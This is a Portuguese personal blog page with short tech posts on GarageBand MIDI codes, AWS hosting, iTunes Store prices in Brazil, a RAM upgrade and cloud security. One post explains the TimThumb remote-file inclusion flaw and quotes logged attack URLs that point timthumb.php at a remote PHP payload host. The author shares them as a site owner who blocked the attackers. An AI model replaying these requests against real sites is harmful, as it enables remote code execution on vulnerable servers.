Blog do Eduardo Costa Meu blog pessoal

1Jan/120

Comandos MIDI no GarageBand

Brincando com meu LPD8 (e cogitando comprar um teclado para acompanhar), senti a necessidade de usar os controles MIDI. Infelizmente, o GarageBand não é muito configurável, então, por tentativa-e-erro, somado ao conteúdo de um site, descobri os seguintes códigos para os CCs (Controller Commands):

  • CC 1 - Modulation (Tracker Editor)
  • CC 4 - Foot Control (Tracker Editor)
  • CC 7 - Track Volume
  • CC 10 - Track Pan
  • CC 11 - Expression (Tracker Editor)
  • CC 64 - Sustain On/Off (Tracker Editor)

Estranhamente, não encontrei o Pitchband (Tracker Editor). Existe um site que menciona outros, mas admito que não é dos mais fáceis de entender. A parte estranha é não ter uma documentação oficial da Apple sobre isso.

Categorias: geek Sem Comentários
28Dez/110

Um ano de AWS

Ontem, dia 27, completou um ano em que a máquina do meu blog está no ar. Um ano sem bater cabeça com administrador mal-remunerado que nem sabe configurar permissões de pasta. Até hoje, por culpa da Amazon, o servidor só ficou fora do ar UMA vez. E, surpreendentemente, foi em uma manutenção programada com dias de antecedência. Esse reboot foi a 18 dias (e o servidor não foi reiniciado desde então).

Mesmo sendo a máquina mais fuleira na Amazon, ainda tem um poder de fogo de dar inveja a muita das hospedagens que já usei até hoje. Mesmo precisando tomar cuidado com as tentativas de invasão, ainda me sinto mais seguro.

Categorias: geek Sem Comentários
14Dez/114

iTunes Store no Brasil

Estava eu com gripe, mal ficando em pé, filosofando se devo enfrentar novamente o ar condicionado do trabalho e me arriscar a piorar ainda mais ou se devia ficar em casa me recuperando com a sensação de culpa (sim, sou caxias). Ao abrir o Mail para remover o spam do dia e mandar um e-mail avisando de minha condição de saúde, deparei-me com uma mensagem da Apple com título curioso: "Apresentamos iTunes Store". Fiquei com uma sensação meio perdida. Ao abrir, entendi: iTunes Store, e não App Store!

Sim! Finalmente! Esse deve ter sido o preço que Steve Jobs estava pagando para entrar no céu: agora é possível comprar música e filmes no Brasil, sem a maluquice de compras estrangeiras! Aproveitei o iTunes sempre aberto (afinal, tenho 8GB de RAM) para conferir. Saí da minha conta americana, fui para a conta brazuca e... Tchan tchan tchan tchaaaan! Aparecem Roberto Carlos e outros em uma aba "Músicas", ao lado de uma aba "Filmes". Comecei a gritar feito uma menininha que ganhou um pônei de natal.

Fui para os filmes. Tropa de Elite 2! Em HD! Mais um grito de menininha. Tá bem, vamos ver o preço. R$ 50, que nem a versão em DVD? Não!! Versão HD por R$ 20! Sim, vintão! Que tal então alugar? QUATRO REAIS. Sim, QUATRO em HD. Gasto mais que isso com metrô por dia (e a TV de lá não é HD)! Quatro reais para ficar um dia assistindo (e você ainda tem 30 dias para começar a assistir). Minha experiência alugando filmes na loja americana confirmou que alugar é melhor que comprar (matemática básica: preciso ver mais de cinco vezes para compensar a compra). Some isso ao fato que vai demorar para eu assistir denovo.

Que tal uma novidade? Smurfs. Eu não assistiria, mas acabou de sair dos cinemas. R$ 50 que nem o DVD? Não! R$ 15 em SD. Dublado para a garotada. Que tal algo mais cult? Lunar por R$ 10. Parece até que simplesmente traduziram US$ por R$, pois os valores são parecidos com os americanos.

Música. Quase esqueci. Seu Jorge em "Músicas para Churrasco": R$ 9 (ou R$ 1 por música). Evanescence em "Fallen", por R$ 6! Preço de camelô! Lançamento "Born This Way" da Lady Gaga por R$ 11 (cada música custa R$ 1). Eu já fui desses que baixava discografia inteira, e aprendi uma coisa: melhor gastar R$ 20 escolhendo vinte músicas boas do que R$ 300 num MP3 que agüente N gigabytes de músicas que nunca vou ouvir. Consegui colocar todas as músicas que comprei minha vida toda (e só comprei as que tinha certeza que ia escutar regularmente) em um iPod Shuffle de 2GB. Nunca consegui esse feito com meus MP3 xing-ling com 32GB e músicas piratas. Agora, nem preciso mais de contas em Londres, Argentina ou EUA. Adeus ilegalidade da pirataria.

Claro que nem tudo são flores. O sistema obviamente está começando, então tem muito filme só em SD, somente dublados, sem aluguel, etc. Considerando os valores, seria uma sacanagem reclamar deles agora.

EDIT: Descobri que aluguel de filmes agora são de 48 horas, no lugar de 24. Mereceu mais um grito "ponástico".

Categorias: geek 4 Comentários
30Nov/110

MacBook com 8GB de memória

Eu sempre achei meu MacBook consideravelmente poderoso. Mesmo sendo um dual core, ele é incrivelmente rápido. O único defeito é a memória: 1.5GB (512MB para a placa de vídeo). Para quem usa o Mail e o Safari, é o suficiente. Para quem é como eu e usa NetBeans, Tomcat, Glassfish, XCode, iTunes, Pixelmator, GarageBand e mais outros, não dá. Eu precisava fechar um para abrir o outro. Agora parece um computador para um developer:

Comprei um kit com dois módulos de 4GB da Crucial. Antes, pesquisei um pouco, claro. Essa marca é a "oficial" da Apple. Fiz o pedido direto com o fabricante. Sairia por míseros US$ 75, só que me ferrei no envio, pois a UPS (não confundir com USPS) fez tudo legalmente correto. O que significa que paguei imposto de importação e ICMS (circulação de mercadoria, baby). A facada ficou maior que o preço original. Até maior que o preço aqui no Brasil. Pelo menos, tenho o consolo de ser original, e não algum pirata. Quem não conhece alguém que comprou um Pen Drive Kingston de trocentos GB e descobriu que era um clone com 2GB?

Categorias: geek Sem Comentários
21Nov/110

Sweet Child of Mine

Na lista dos prodígios mirins, temos a pequena Zoe, de 7 anos, que sabe tocar Sweet Child o'Mine numa guitarra. Se não fosse pequenos deslizes de uma ou outra nota no filme inteiro (sim, ela toda a música completa), eu desacreditaria.

21Nov/110

This is my story

Encontrei um site deveras criativo. A música inspiradora gera um clima interessante, mas tecnologicamente também é um show - consegue embutir bem a foto nas cenas. Acho que se a foto fosse melhor, o resultado ficaria mais suavemente encaixado. Mas, fora o problema de usuário com preguiça de arrumar foto melhor, é algo impressionante.

Eis o link: http://www.this-is-my-story.com/v/7Y9E3WQDY649

9Nov/111

Segurança na Nuvem

Segurança na nuvem é um mito clássico. Vamos do básico: o que diferencia um serviço de cloud de um serviço de datacenter ou até uma solução "in-house"? Segundo os descrentes, ter uma equipe de infra e poder "tocar" fisicamente nos servidores é algo imprescindível. Mas, no fundo, é tudo igual. Veja o porquê nessa lista de problemas clássicos:

  • Perda de dados: muitos se borram de medo da nuvem, achando que é possível perder os dados. Alguém ouviu falar em backups? Pode ser um servidor na mesa do dono da empresa ou uma máquina virtualizada na Amazon. Se você não faz cópias de segurança, o risco de perder os dados é o mesmo. Se seu site está disponível em apenas uma máquina, sem nenhuma redundância (load balancing, cluster, etc), você tem apenas um ponto de falha - mais uma vez independente de onde sua máquina está.
  • Segurança: tem medo de alguém roubar seus dados? Persisto em dizer que uma máquina na nuvem é igual a qualquer outra - use criptografia e firewall. O Jet Propulsion Labs da NASA tem toda uma massa de dados sensível, e tudo na Amazon. Colocaram criptografia onde precisava e até um software de firewall customizado para fazer VPN com clientes externos. E sua rede interna? Vai bem? Firewall bem configurado, NAT correta, dados críticos criptografados? E-mail com algum sistema anti-vírus? Acredite se quiser, mas já recebi vírus em e-mail corporativo - o que não acontece nos meus e-mails hospedados no Google Apps.
  • Confiabilidade do provedor: segue a mesma regra da perda de dados - backup, redundância, segurança, etc. Se tem medo do provedor cair, sumir ou roubar seus dados, por que escolheu ele, então? O mesmo que escolher um provedor web de R$ 5/mês: assumir o risco da empresa prestar um péssimo serviço, sumir com os dados ou até te infectar com vírus (já fui infectado em um provedor barato da época de pós-adolescente sem grana). Ou ainda, é o mesmo risco do estagiário mal-remunerado que cuida do servidor fazer um "format c:" ou queimar uma placa.
Em resumo, note que esses mitos na computação em nuvem não são diferentes dos problemas que soluções "in-house" enfrentam. Meu blog está na nuvem e eu tenho as mesmas preocupações de segurança e afins que eu teria se estivesse na sala de casa ou num provedor web. Com a vantagem que não preciso me preocupar com a Eletropaulo faltando com a qualidade de serviço ou em sofrer na mão de suporte que configura mal o host e todos os clientes passam a ter acesso a tudo (sim, já aconteceu comigo - também na época "poor-guy").
Categorias: cloud 1 Comentário
8Nov/110

Memcached, Jira e mais tentativas de invasão

Vamos a boa notícia: como sobraram alguns megas na memória do servidor, instalei um memcached e, agora, o blog usa-o para fazer cache em memória. Nem preciso dizer que a carga do servidor foi lá em baixo. Ou seja, continuo com a máquina mais fuleira da Amazon (míseros 600mb de memória) e ainda consigo hospedar um site inteiro com boa performance. Claro que essa memória liberada foi graças a remoção dos serviços de e-mail (postfix e dovecot) - migrei tudo para o Google Apps.

Estou testando também o Jira On-Demand. A intenção é substituir o horrível Mantis por algo mais útil e, de bônus, não precisar gerenciar mais um servidor. US$ 10 por mês seria o custo de uma instância t1.micro na Amazon, com a desvantagem que o Jira ajuda no bom nome do Java sendo absurdamente pesado, inviabilizando usar uma instância tão simples. Então, prefiro pagar US$ 10 em algo que eu não precise dar manutenção - com a vantagem que, se o Jira provar seu valor (tenho ainda um mês de trial), eu posso fazer uma assinatura anual e derrubar o custo para uns US$ 8 por mês! Com isso, meus projetos na Apple Store ganham uma URL mais profissional e amigável.

Como nem tudo são flores, fui dar uma entrada rápida na home do meu blog no trabalho para testar a velocidade em outra rede, quando, mais uma vez, estava tudo travado - algo estranho para um site que devia estar super-rápido. Na hora do almoço, entrei no servidor e descobri script-kiddies tentando invadir o sistema. Dessa vez foram dois de uma vez, e com o mesmo truque. Existe um tal de TimThumb, que contém uma verdadeira cratera de segurança: ele aceita receber conteúdo externo vindo de sites como "youtube.com", "wordpress.com" e afins, mas não só aceita código executável (!!!), como também valida o remetente via "substring" (sim, aceita "wordpress.com.hostdail.com", por exemplo!!!!!).

Lindo, típico serviço de alguém que aprender a programar ontem. O divertido foi como descobriram a falha. O blog do criador do "plugin" foi invadido por uma broca em sua própria criação. Depois tem gente que pergunta por que não gosto de libs. Eu não uso esse traste, nem meu tema usa, mas hoje, novamente, meu servidor foi a 100% graças a dois idiotas que não sabem processar códigos de erro HTTP (sim, novamente). Olhando nos logs, descobri que o casal 1/20 tentava carregar os seguintes endereços:

  • //wp-content/themes/boast/functions/_tbs.php?src=http://wordpress.com.hostdail.com/logs/logs.php
  • //wp-content/themes/boast/functions/timthumb.php?src=http://wordpress.com.hostdail.com/bot.ph
  • /category/geek//wp-content/themes/boast/functions/_tbs.php?src=http://wordpress.com.hostdail.com/
    bot.php

Sim, com duas barras Deus-sabe-o-porquê, e um tema que não tenho instalado. Seria só mais uma tentativa frustrada se "Debi e Lóide" não ficassem tentando os mesmos endereços incessantemente. Detalhe: esses arquivos nem existem! Já criei uma categoria para o que faço de configuração em servidores - daqui a pouco, com tanta besteira que estou pegando, vou ter que criar um blog inteiro!

PS: Agora, virou os três patetas... O terceiro idiota acabou de tentar invadir. Pelo menos, esse tentou com mais de uma URL. Ele era britânico (server1.edjeavons.co.uk) e agora faz parte dos meus bloqueios do iptables.

7Nov/110

Mais uma do Lomadee

Estava eu vendo as opções de lojas que tem no Lomadee, quando encontrei a MegaTNT. Seria somente mais uma loja de eletrônicos e afins, mas descobri uma categoria chamada "bugingangas". Fiquei curioso e entrei. Encontrei algumas coisas bem nerds:

Tem mais umas coisas legais (que nem as camisas animadas), mas cansei de copiar e colar links... :)

7Nov/110

Último CD

Eu quis testar os "links lomadizados". Escolhi, então, um produto que deve agradar metade dos visitantes (doravante, lembrarei que quantidade não é diretamente proporcional a qualidade).

CD "De Pele, Alma e Coração" do cantor Eduardo Costa

Sim, SEO e SEM usados de uma forma que não corresponde a meu status quo. Clara e evidentemente não orgulho-me.

PS: Ainda para aumentar o ranking, poderia ser dito: "Eduardo Costa morreu?" ou "Acidente do Eduardo Costa" - funciona, acredite!